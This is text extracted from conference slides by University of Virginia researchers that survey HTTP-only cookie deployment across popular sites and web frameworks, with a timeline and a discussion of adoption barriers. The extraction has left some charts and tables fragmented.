Why aren’t HTTP-only cookies more widely deployed?

transcript

Yuchen ZhouDavid Evans

Department of Computer ScienceUniversity of Virginia

Modify DOM

Disclose user’s confidential

Install trojan

HTTP-only Cookies

Document.cookie

Evil JS

Send back

User credentials

HTTP-only field prevents cookies from being read via document.cookie.

Cookie:Name = value;Domain = value;Expiration time = value;Path = value;Secure

Cookie:Name = value;Domain = value;Expiration time = value;Path = value;Secure;Httponly

Inject

Lots of major sites still don’t use HTTP-only cookie

HTTP-only Deployment Timeline

Ruby on Rails sets HTTP-only on by default

2002 2003 2004 2005 2006 2007 2008 2009 2010IE6 introduces HTTP-only

Firefox extension supports HTTP-only

Firefox 2.0.0.5 supports HTTP-only.

Django developers consider supporting HTTP-only, but compatibility concerns held them back.

Ruby on Rails supports HTTP-only

TRACE method is still on by default on Apache servers and major websites [10]

w3.org specifies that browsers should disallow TRACE XMLHTTPRequests

IETF standard draft includes HTTP-only

Still no official Django support for HTTP-only

US-CERT vulnerability note on XST attacks

Apache.org compromised by cookie stealing XSS attacks

Python supports HTTP-only. Django unofficial patch available.

IE8 fixes XMLHTTPResponse exploit

TRACE method disabled by all major browsers

Methodology• 50 sites collected from Alexa.com world top 100 popular sites.

• Manually registered accounts and collected post-login cookie properties of all sites.

Httponly?

Survey Results

No HTTP-only au-thentication cook-

ies, 26

Use HTTP-only authentication

cookies, 24

No HTTP-only au-thentication cook-

ies, 26Before login,

After login, 13

Kapil Singh et al (2010 Oakland) also gave similar results on the deployment of HTTP-only cookies:

HTTP-only: 30/100 16.2% on 100,000

Frameworks Version Date HTTP-only Support

HTTP-only Default

1.1.1 July 2009 No

Authkit 0.4.4 July 2009 NoRepoze.who 1.0.10 2009 No

2.3.2 Mar 2009 Yes Yes2.2.2 Nov 2008 Yes No2.1.2 Oct 2008 No4.0 Feb 2010 Yes Yes

1.4 Feb 2010 Yes No

3.0 Feb 2010 No No

Survey Results on Web Frameworks

Why Aren’t HTTP-only Cookies More Widely Deployed?

Does DOM need to read cookies?

– Only 1 site out of 50 showed a minor malfunction on their web IM gadget. (renren.com)

Page Functionality

Httponly;

Can We Circumvent HTTP-only?

Send back

Document.cookieHTTPONLY

Inject

Cross-Site TracingXMLHTTPRequest

var cookie

Evil JS

Can We Circumvent HTTP-only?• Cross-site tracing • AJAX based attack

Use HTTP-only

None-HTTP

-only05

1015202530

Enable TraceDisable Trace

Use HTTP-only

None-HTT

P-only05

1015202530

InsecureSecure

Protection Effectiveness

rNetwork package sniffer

Hard drive

• Python doesn’t support HTTP-only until 2.6

• Django is based on python, so the deployment progress is stalled.

Software Stack Compatibility“Hmm, we probably can't use a patch that requires a patched python. Any different

solution?”

Django Developers

Standards Compliance

• Cookie specification has never been updated since HTTP-only was introduced.

• Without the specs, the developers are hesitating to make the change.

“Also, could you point me to where the RFC is talking about 'httponly'? I couldn't find it

at all.”

Django Developers

Ruby on Rails sets HTTP-only on by default

2002 2003 2004 2005 2006 2007 2008 2009 2010IE6 introduces HTTP-only

Firefox extension supports HTTP-only

Firefox 2.0.0.5 supports HTTP-only.

Django developers consider supporting HTTP-only, but compatibility concerns held them back.

Ruby on Rails supports HTTP-only

TRACE method is still on by default on Apache servers and major websites [10]

w3.org specifies that browsers should disallow TRACE XMLHTTPRequests

IETF standard draft includes HTTP-only

Still no official Django support for HTTP-only

US-CERT vulnerability note on XST attacks

Python supports HTTP-only. Django unofficial patch available.

IE8 fixes XMLHTTPResponse exploit

TRACE method disabled by all major browsers

Difficulty in Deploying in Both Ends

• Similar deployment issues:– Set-cookie2 header in RFC2965– Updating TCP protocol

Difficulty in Deploying in Both Ends

• Add HTTP-only field to cookies • Interpret HTTP-only field correctly

• Disable Trace and implementSet-cookie securely

• Implement HTTP-only defense correctly

Lessons Learned

①Maintain backward compatibility

②Be aggressive on client side.

③Opt-in? Opt-out!

Httponly = trueHttponly

+ H tt p o n l y

Questions?

Thank you!

Backup Slides

• Kapil Singh et al (2010 Oakland) also proved similar results on the deployment of HTTP-only cookies:

Survey Results

Survey Results on More Sites

Page Functionality

Google analytics?

Why aren’t HTTP-only cookies more widely deployed?

Documents